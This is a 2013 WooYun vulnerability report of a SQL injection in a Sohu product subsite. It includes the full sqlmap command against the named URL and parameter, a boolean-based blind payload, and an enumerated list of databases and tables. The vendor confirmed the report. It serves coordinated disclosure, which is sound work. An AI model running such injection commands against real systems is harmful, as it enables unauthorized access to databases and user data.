漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-035455
漏洞标题:搜狐分站sql注入之三(大量数据)
相关厂商:搜狐
漏洞作者: feng
提交时间:2013-08-28 09:02
修复时间:2013-10-12 09:03
公开时间:2013-10-12 09:03
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-28: 细节已通知厂商并且等待厂商处理中
2013-08-29: 厂商已经确认,细节仅向厂商公开
2013-09-08: 细节向核心白帽子及相关领域专家公开
2013-09-18: 细节向普通白帽子公开
2013-09-28: 细节向实习白帽子公开
2013-10-12: 细节向公众公开
简要描述:
搜狐分站sql注入之三(大量数据)
详细说明:
[root@Hacker~]# Sqlmap -u "http://product.it.sohu.com/core/vote.php" --data "action=comment&pid=344043&vote=vote4&page="
Place: POST
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=comment&pid=344043 AND 2254=2254&vote=vote4&page=
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
漏洞证明:
应厂商要求,不能泄露数据,贴些数据库和表以作证明
available databases [7]:
[*] act
[*] down
[*] information_schema
[*] stock
[*] t
[*] tv
[*] zoldb
Database: tv
[17 tables]
+---------------------------------------+
| area |
| article |
| category |
| counts |
| evaluate_result |
| evaluates |
| manufacturer |
| merchant |
| merchant_area |
| param_category |
| params |
| product_param |
| product_param_bac |
| product_property |
| products |
| serials |
| sys_user |
+---------------------------------------+
Database: down
[36 tables]
+---------------------------------------+
| x_adaptprojects |
| x_backyard_downediting |
| x_backyard_groups |
| x_backyard_logs |
| x_backyard_sessions |
| x_backyard_users |
| x_cates |
| x_channels |
| x_dev_accesslog |
| x_dev_keyvalue |
| x_developers |
| x_downfields |
| x_downhistories |
| x_downpushs |
| x_downrelates |
| x_downs |
| x_files |
| x_groups |
| x_images |
| x_languages |
| x_mobiles |
| x_mobiles_useragent |
| x_mtc_users |
| x_pages |
| x_projects |
| x_rates |
| x_reports |
| x_reporttypes |
| x_sessions |
| x_sets |
| x_stats_5m |
| x_stats_agent |
| x_stats_day |
| x_stats_day_channel |
| x_stats_search |
| x_vendors |
+---------------------------------------+
Database: t
[6 tables]
+---------------------------------------+
| stat_user_byday |
| sync_job |
| sync_queue |
| sync_sina_media |
| sync_sina_t |
| sync_sina_user |
+---------------------------------------+
修复方案:
你们专业
版权声明:转载请注明来源 feng@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-08-29 00:13
厂商回复:
感谢支持。^_^
最新状态:
暂无